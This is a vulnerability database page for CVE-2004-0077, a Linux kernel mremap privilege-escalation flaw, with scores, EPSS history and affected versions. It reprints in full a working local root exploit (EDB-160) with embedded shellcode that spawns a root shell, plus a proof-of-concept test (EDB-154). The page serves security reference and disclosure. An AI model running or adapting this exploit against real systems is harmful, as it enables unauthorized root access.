CVE-2004-0077

EPSS

0.11%V4

Vector

Local

Published

2004-09-01
02h00 +00:00

Modified

2011-07-16
22h00 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.01%	–	–
2022-03-27	–	–	4.01%	–	–
2022-04-03	–	–	4.01%	–	–
2022-10-23	–	–	4.01%	–	–
2023-01-01	–	–	4.01%	–	–
2023-01-29	–	–	4.01%	–	–
2023-03-12	–	–	–	0.04%	–
2023-05-14	–	–	–	0.04%	–
2023-06-04	–	–	–	0.04%	–
2023-06-25	–	–	–	0.04%	–
2023-07-02	–	–	–	0.04%	–
2023-07-09	–	–	–	0.04%	–
2023-07-30	–	–	–	0.04%	–
2023-09-17	–	–	–	0.04%	–
2023-12-03	–	–	–	0.04%	–
2024-03-10	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-12-22	–	–	–	0.12%	–
2025-02-16	–	–	–	0.12%	–
2025-01-19	–	–	–	0.12%	–
2025-02-16	–	–	–	0.12%	–
2025-03-18	–	–	–	–	0.11%
2025-03-30	–	–	–	–	0.11%
2025-04-06	–	–	–	–	0.11%
2025-04-06	–	–	–	–	0.11,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	68%
2022-03-27	69%
2022-04-03	85%
2022-10-23	86%
2023-01-01	85%
2023-01-29	86%
2023-03-12	7%
2023-05-14	8%
2023-06-04	7%
2023-06-25	8%
2023-07-02	7%
2023-07-09	8%
2023-07-30	7%
2023-09-17	8%
2023-12-03	7%
2024-03-10	–
2024-06-02	–
2024-12-22	47%
2025-02-16	48%
2025-01-19	47%
2025-02-16	48%
2025-03-18	27%
2025-03-30	26%
2025-04-06	27%
2025-04-06	27%

Exploit information

Exploit Database EDB-ID : 160

Publication date : 2004-02-29 23h00 +00:00
Author : Paul Starzetz
EDB Verified : Yes

/* * * mremap missing do_munmap return check kernel exploit * * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte * ./mremap_pte [suid] [[shell]] * * Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2 * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <syscall.h> #include <signal.h> #include <time.h> #include <sched.h> #include <sys/mman.h> #include <sys/wait.h> #include <sys/utsname.h> #include <asm/page.h> #define str(s) #s #define xstr(s) str(s) // this is for standard kernels with 3/1 split #define STARTADDR 0x40000000 #define PGD_SIZE (PAGE_SIZE * 1024) #define VICTIM (STARTADDR + PGD_SIZE) #define MMAP_BASE (STARTADDR + 3*PGD_SIZE) #define DSIGNAL SIGCHLD #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM) #define MREMAP_MAYMOVE ( (1UL) << 0 ) #define MREMAP_FIXED ( (1UL) << 1 ) #define __NR_sys_mremap __NR_mremap // how many ld.so pages? this is the .text section length (like cat // /proc/self/maps) in pages #define LINKERPAGES 0x14 // suid victim static char *suid="/bin/ping"; // shell to start static char *launch="/bin/bash"; _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e); unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); static volatile unsigned base, *t, cnt, old_esp, prot, victim=0; static int i, pid=0; static char *env[2], *argv[2]; static ulong ret; // code to appear inside the suid image static void suid_code(void) { __asm__( " call callme \n" // setresuid(0, 0, 0), setresgid(0, 0, 0) "jumpme: xorl %ebx, %ebx \n" " xorl %ecx, %ecx \n" " xorl %edx, %edx \n" " xorl %eax, %eax \n" " mov $"xstr(__NR_setresuid)", %al \n" " int $0x80 \n" " mov $"xstr(__NR_setresgid)", %al \n" " int $0x80 \n" // execve(launch) " popl %ebx \n" " andl $0xfffff000, %ebx \n" " xorl %eax, %eax \n" " pushl %eax \n" " movl %esp, %edx \n" " pushl %ebx \n" " movl %esp, %ecx \n" " mov $"xstr(__NR_execve)", %al \n" " int $0x80 \n" // exit " xorl %eax, %eax \n" " mov $"xstr(__NR_exit)", %al \n" " int $0x80 \n" "callme: jmp jumpme \n" ); } static int suid_code_end(int v) { return v+1; } static inline void get_esp(void) { __asm__( " movl %%esp, %%eax \n" " andl $0xfffff000, %%eax \n" " movl %%eax, %0 \n" : : "m"(old_esp) ); } static inline void cloneme(void) { __asm__( " pusha \n" " movl $("xstr(CLONEFL)"), %%ebx \n" " movl %%esp, %%ecx \n" " movl $"xstr(__NR_clone)", %%eax \n" " int $0x80 \n" " movl %%eax, %0 \n" " popa \n" : : "m"(pid) ); } static inline void my_execve(void) { __asm__( " movl %1, %%ebx \n" " movl %2, %%ecx \n" " movl %3, %%edx \n" " movl $"xstr(__NR_execve)", %%eax \n" " int $0x80 \n" : "=a"(ret) : "m"(suid), "m"(argv), "m"(env) ); } static inline void pte_populate(unsigned addr) { unsigned r; char *ptr; memset((void*)addr, 0x90, PAGE_SIZE); r = ((unsigned)suid_code_end) - ((unsigned)suid_code); ptr = (void*) (addr + PAGE_SIZE); ptr -= r+1; memcpy(ptr, suid_code, r); memcpy((void*)addr, launch, strlen(launch)+1); } // hit VMA limit & populate PTEs static void exhaust(void) { // mmap PTE donor t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) goto failed; // prepare shell code pages for(i=2; i<LINKERPAGES+1; i++) pte_populate(victim + PAGE_SIZE*i); i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ); if(i) goto failed; // lock unmap base = MMAP_BASE; cnt = 0; prot = PROT_READ; printf("\n"); fflush(stdout); for(;;) { t = mmap((void*)base, PAGE_SIZE, prot, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) { if(ENOMEM==errno) break; else goto failed; } if( !(cnt%512) || cnt>65520 ) printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base, base+PAGE_SIZE); fflush(stdout); base += PAGE_SIZE; prot ^= PROT_EXEC; cnt++; } // move PTEs & populate page table cache ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM); if(-1==ret) goto failed; munmap((void*)MMAP_BASE, old_esp-MMAP_BASE); t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(MAP_FAILED==t) goto failed; *t = *((unsigned *)old_esp); munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE)); printf("\n[+] Success\n\n"); fflush(stdout); return; failed: printf("\n[-] Failed\n"); fflush(stdout); _exit(0); } static inline void check_kver(void) { static struct utsname un; int a=0, b=0, c=0, v=0, e=0, n; uname(&un); n=sscanf(un.release, "%d.%d.%d", &a, &b, &c); if(n!=3 || a!=2) { printf("\n[-] invalid kernel version string\n"); _exit(0); } if(b==2) { if(c<=25) v=1; } else if(b==3) { if(c<=99) v=1; } else if(b==4) { if(c>18 && c<=24) v=1, e=1; else if(c>24) v=0, e=0; else v=1, e=0; } else if(b==5 && c<=75) v=1, e=1; else if(b==6 && c<=2) v=1, e=1; printf("\n[+] kernel %s vulnerable: %s exploitable %s", un.release, v? "YES" : "NO", e? "YES" : "NO" ); fflush(stdout); if(v && e) return; _exit(0); } int main(int ac, char **av) { // prepare check_kver(); memset(env, 0, sizeof(env)); memset(argv, 0, sizeof(argv)); if(ac>1) suid=av[1]; if(ac>2) launch=av[2]; argv[0] = suid; get_esp(); // mmap & clone & execve exhaust(); cloneme(); if(!pid) { my_execve(); } else { waitpid(pid, 0, 0); } return 0; } // milw0rm.com [2004-03-01]

Exploit Database EDB-ID : 154

Publication date : 2004-02-17 23h00 +00:00
Author : Christophe Devine
EDB Verified : Yes

/* * Proof-of-concept exploit code for do_mremap() #2 * * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1". * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/ * * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void *base0; void *base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( "mmap" ); break; } base0 = base1; base1 = (void *) ret; } printf( "created ~%d VMAs\n", i ); base0 += 0x1000; base1 += 0x1000; printf( "now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( "kernel may not be vulnerable\n" ); return( 0 ); } // milw0rm.com [2004-02-18]

Products Mentioned

Configuraton 0

Redhat>>Bigmem_kernel >> Version 2.4.20-8

Redhat>>Kernel >> Version 2.4.20-8

Redhat>>Kernel_doc >> Version 2.4.20-8

Configuraton 0

Redhat>>Kernel_source >> Version 2.4.20-8

Linux>>Linux_kernel >> Version 2.2.0

Linux>>Linux_kernel >> Version 2.2.0 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.1

Linux>>Linux_kernel >> Version 2.2.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.2

Linux>>Linux_kernel >> Version 2.2.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.3

Linux>>Linux_kernel >> Version 2.2.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.4

Linux>>Linux_kernel >> Version 2.2.4 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.4 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.5

Linux>>Linux_kernel >> Version 2.2.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.6

Linux>>Linux_kernel >> Version 2.2.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.7

Linux>>Linux_kernel >> Version 2.2.7 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.8

Linux>>Linux_kernel >> Version 2.2.8 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.9

Linux>>Linux_kernel >> Version 2.2.9 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.10

Linux>>Linux_kernel >> Version 2.2.10 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.11

Linux>>Linux_kernel >> Version 2.2.11 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.12

Linux>>Linux_kernel >> Version 2.2.12 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.13

Linux>>Linux_kernel >> Version 2.2.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.14

Linux>>Linux_kernel >> Version 2.2.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.15 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.15_pre20

Linux>>Linux_kernel >> Version 2.2.16

Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.16

Linux>>Linux_kernel >> Version 2.2.16 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.17

Linux>>Linux_kernel >> Version 2.2.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.17 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.17 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.18

Linux>>Linux_kernel >> Version 2.2.18 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.19

Linux>>Linux_kernel >> Version 2.2.19 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.20

Linux>>Linux_kernel >> Version 2.2.20 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.21

Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.21 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.22

Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.22 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.23

Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.23 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.2.24

Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.2.24 (Open CPE detail)